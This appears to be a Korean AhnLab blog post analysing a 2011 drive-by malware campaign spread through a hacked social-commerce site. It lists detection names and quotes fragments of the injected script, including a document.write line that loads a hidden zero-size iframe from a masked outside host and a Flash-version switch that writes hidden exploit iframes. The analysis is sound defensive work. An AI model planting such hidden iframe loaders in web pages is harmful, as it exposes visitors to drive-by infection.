본문 바로가기
AhnLab 보안in

주말 틈타 소셜 커머스로 유포되는 악성코드 주의!

by 보안세상 2020. 4. 12.

2011.07.01

 

안녕하세요. 안랩인입니다. 주말만 되면, 한 주간의 피로를 훌훌 털고 여가를 즐기러가는 사이 사용자들의 PC는 악성코드 감염으로 몸살을 앓습니다. 사람들이 잠든 밤, 방심하는 금요일 밤에 악성코드나 해킹이 유독 출몰하곤 합니다.
 
최근 소셜커머스 사이트를 많이 이용하고 있으실 텐데요, 지난 주말 소셜커머스 사이트에서 악성코드 유포 사례가 발생한 바 있습니다. 

V3 진단명

악성코드는 V3:2011.06.26.01이상의 엔진 버전에서 아래와 같이 진단되었습니다.

Win-Trojan/Agent.90588(V3)
Win-Trojan/Agent.33592272(V3)
Win-Trojan/Agent.33606100(V3)
JS/Agent(V3)
HTML/Agent(V3)
SWF/Cve-2010-2884(V3)
HTML/Agent(V3)


어떤 방식으로 발생하게 되었는지, 사례를 간략히 정리합니다.
* 참고: 해당 사이트 및 악성코드 유포 주소는 공개하지 않습니다.


감염 경로 사례

악성 스크립트가 삽입된 해당 사이트의 페이지는 아래와 같습니다.

 

[그림] 악성 스크립트 주소가 삽입된 페이지



아래의 main.html을 다운로드 한 후 실행하는 스크립트로써, 아래 코드를 저장하고 있습니다.

코드내용:
document.write("<iframe src=http://test.*****.com/data/main.html width=0 height=0></iframe>");

main.html의 구조를 요약해 보면 아래와 같습니다.

 

[그림] main.html의 동작구조


main.html - Cookie를 체크하는 경로 

해킹된 웹 사이트를 통해서 유포되는 악성 스크립트의 대부분이 Cookie 체크루틴 을 사용하는데, 이유는 감염된 PC가 해킹된 웹 사이트에 다시 접속할 때에 또다시 감염되는 경우를 방지하기 위한 목적으로 사용되었습니다.

'main.html'이 실행되면 helpor_net()를 호출하도록 되어 있습니다.

 

[그림] main.html의 쿠키체크 루틴


main.html - IE버전을 체크하는 경로

 IE(Internet Explorer)의 버전을 체크하는 이유는, 해킹된 사이트에 접속했을때 사용자의 브라우저의 버전에 따라 취약점이 동작될지 말지가 결정되기 때문입니다. 예를들면 IE 8에서는 동작하는 취약점이 IE 6, 7에서는 동작하지 않을 수 있다라는 의미입니다.

 

[그림] Internet Explorer 버전 체크 루틴


악성 스크립트에서 브라우저의 버전을 체크하는 방법은, navigator.useragent.toLowerCase()를 자주 사용하며 아래 스크립트를 실행하면 그림처럼 브라우저 버전이 포함된 정보가 포함된 경고창이 출력됩니다.

<script>
  var IE_Version = navigator.userAgent.toLowerCase();
  alert(IE_Version);
</script>

[그림] navigator.useragent.toLowerCase()



Flash Player 버전을 체크하는 경로
 

main.html Flash Player 버전체크 루틴은 아래와 같습니다.

switch (VSwf)
{

   case "WIN 10,3,181,23":

     document.writeln("<iframe src=fnew.html width=10 height=0><\/iframe>");

     break

   case "WIN 10,3,181,22":

     document.writeln("<iframe src=fnew.html width=10 height=0><\/iframe>");

     break

   case "WIN 10,3,181,14":

     document.writeln("<iframe src=fnew.html width=10 height=0><\/iframe>");

     break

  default:

     document.writeln("<iframe src=fold.html style=\"width:100; height:0;\"><\/iframe>");

}

Flash Player버전이 10,3,181,23 / 10,3,181,22 / 10,3,181,14일 경우는 fnew.html을 다운로드, 그외 버전은 fold.html을 다운로드 하도록 되어 있습니다.

보다 자세한 분석 내용은 안철수연구소 ASEC 대응팀 블로그에서 확인하실 수 있습니다.

소셜커머스(Social Commerce) 사이트를 통한 악성코드 유포사례(1)
소셜커머스(Social Commerce) 사이트를 통한 악성코드 유포사례(2)



악성코드 감염을 예방하기 위해서는 항시 보안 업데이트를 하는 것이 좋습니다.
또 다른 방법은, SiteGuard로도 확인할 수 있는데요. 악성코드를 유포하는 사이트를 방문할 경우 SiteGuard 에서 PC사용자에게 해당사이트의 악성코드 감염 여부를 알려주게 됩니다.

 

⊙ 안철수연구소에서 제공하는 사이트 가드 설치 페이지 : http://siteguard.co.kr/

V3와 SiteGuard를 통해 안전하고 편리한 PC생활 하세요~! Ahn

 

댓글0